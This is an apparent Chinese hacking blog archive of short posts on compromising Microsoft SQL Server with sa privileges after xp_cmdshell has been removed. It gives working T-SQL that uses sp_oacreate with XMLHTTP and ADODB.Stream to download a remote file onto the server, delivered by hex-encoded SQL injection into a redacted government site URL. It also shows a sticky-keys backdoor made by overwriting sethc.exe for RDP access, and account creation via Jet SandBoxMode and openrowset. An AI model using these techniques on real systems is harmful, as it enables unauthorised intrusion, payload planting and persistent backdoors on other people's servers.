Chinadu`s Blog » SA

xml.http 下载拿SHELL

Chinadu — Fri, 24 Jul 2009 03:22:03 +0000

注意以下语句在SA权限下执行，对于N多扩展存储过程被删除时使用效果最佳:

DECLARE
@B varbinary(8000),
@hr int,
@http INT,
@down INT
EXEC sp_oacreate [Microsoft.XMLHTTP],@http output ;EXEC @hr = sp_oamethod @http,[Open],null,[GET],[要下载的文件地址],0 ;EXEC @hr = sp_oamethod @http,[Send],null ;EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output ;EXEC @hr=sp_oacreate [ADODB.Stream],@down output ;EXEC @hr=sp_OASetProperty @down,[Type],1 ;EXEC @hr=sp_OASetProperty @down,[mode],3 ;EXEC @hr=sp_oamethod @down,[Open],null ;EXEC @hr=sp_oamethod @down,[Write],null,@B ;EXEC @hr=sp_oamethod @down,[SaveToFile],null,[保存在服务器上的绝对路径],1 ;--
将以上代码修改后转化为十六进制。然后提交：
http://www.XXXX.gov.cn/XXX/hdsq/XXXXfo.jsp?ID=8 ;DECLARE @S VARCHAR(4000);SET @S=CAST(十六进制代码 AS VARCHAR(4000));EXEC(@S);--

sa权限下无xp_cmdshell下取权限又一简单方法

Chinadu — Thu, 25 Jun 2009 09:21:55 +0000

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
（很多服务器都把'wscript.shell'给删了。）
看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。
上网找了些资料，得到下面方法：
复制文件：

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点"我的电脑"右键"管理" 用户管理直接加用户。
此法随无技术可言，希望对某些人有点用。

sa 无xp_cmdshell下提限又一简单方法

Chinadu — Sun, 09 Dec 2007 16:58:10 +0000

declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理” 用户管理直接加用户。
此法随无技术可言，希望对某些人有点用。

SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

Chinadu — Sun, 18 Nov 2007 15:42:38 +0000

sa下删除xp_cmdshell和xplog70.dll时候的一种办法，不算新的了，
也被一些人不断的再次提出来，
为了方便自己记忆再写出来，
在这种情况下，要执行命令，条件是要有xp_regwrite。

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')

Chinadu`s Blog » SA

xml.http 下载拿SHELL

相关文章

sa权限下无xp_cmdshell下取权限又一简单方法

相关文章

sa 无xp_cmdshell下提限又一简单方法

相关文章

SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

相关文章